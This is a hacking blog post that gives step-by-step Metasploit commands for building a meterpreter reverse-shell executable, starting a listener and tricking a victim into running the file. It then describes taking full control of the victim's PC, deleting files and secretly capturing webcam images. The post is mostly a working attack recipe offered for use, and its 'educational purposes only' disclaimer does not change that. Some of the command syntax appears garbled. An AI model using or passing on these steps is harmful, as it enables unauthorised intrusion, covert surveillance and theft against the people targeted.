How to Hack A PC | Kali Linux | Creating Infectious Virus and Hack | Meterpreter Hack
INTRO...
Hello frnds welcome to this blog.Today you are going to learn how to hack a remote pc using kali linux .You can use this trick to access the remote pc and can do anything you want to do with that pc.You can transfer all the files from that pc , delete anything , crash ,shutdown , means you have full control over the pc.We will use a method of creating an infectious virus file and transfering it to the victim's pc , and get the access of the pc.So lets begin..
INFECT AND HACK..
So first of all we will learn about this method , that what is this method about ,
So basically this method is based on creating a virus file and transfering it to the victim, then it will create a backdoor on the victim's pc and you will be able to access the machine , you can the owner of the machine.
You can do anything you want like deleting files , creating new one , record webcam shots without informing the victim, you can take snapshots ,and many more.
This method is for both computers and phones basically android.You can use the same method for hacking android phones and get the access.You will learn more about ANDROID hacking in my other blogs.
So first lets start pc hacking...
I hope you all have kali linux in your pc who are reading this blog , open the terminal..and open metasploit framework console by typing..
#msfconsole
It will take some time to open so keep patience.Let it open.
When it opens...
type..
#use windows/meterpreter/reverse_tcp
now type..
#show options
it will provide you with some options.select one..
type..
#set LHOST (YOUR ONLINE IP ADDRESS)
YOU CAN FIND OUT YOUR ONLINE IP ADDRESS BY SEARCHING ...
#whatismyip
you will get your ip addrerss..paste it in the above code..then
type..
#generate -t exe -f filename.exe
it will generate an infectious exe file to create a backdoor in the victim's pc..
Your file is stored in your root folder...
Now open another terminal and type msfconsole again...
when it opens..
type..
#use exploit/multi/handler
It will open an exploit window..
then type..
#use PAYLOAD windows/meterpreter/reverse_tcp
type..
#show options
It will provide you with some options..select..
#set LHOST (YOUR LOCAL IP ADDRESS)
YOU CAN FIND IT BY TYPING ifconfig IN YOUR TERMINAL...THIS IS YOUR LOCAL IP ADDRESS ON WHICH YOU WILL RECIEVE THE INFORMATION...
now type..
#set LPORT(LOCAL PORT 443)
NOW TYPE..
#EXPLOIT
Your exploit will start and it will show you a window like this...
Now the work you have to do is to transfer the virus file to the victim's machine , and tell him to open it
The moment the file is open you will see written..
#Meterpreter session 1 opened
CONGRATULATIONS YOU HAVE HACKED IT..!!!
Just type show options to see the related options related to the access to the computer, like webcam list ,snapshot and many more , you can use any of them.If you want do high level things like crashing the pc or trnsefering files you have to use codes to do that , means you require programming skills.
SO GO AND TRY IT ...BUT REMEMBER THIS BLOG IS FOR ONLY GOOD PURPOSES LIKE EDUCATIONAL PURPOSE NOT FOR ILLEGAL USE .
IF YOU USE IT FOR WRONG PURPOSE THEN I WILL NOT BE RESPONSIBLE FOR THAT.SO USE IT CAREFULLY BECAUSE...
ONE MISTAKE IN HACKING CAN MAKE YOU TRAPPED...!!!
Comments
Post a Comment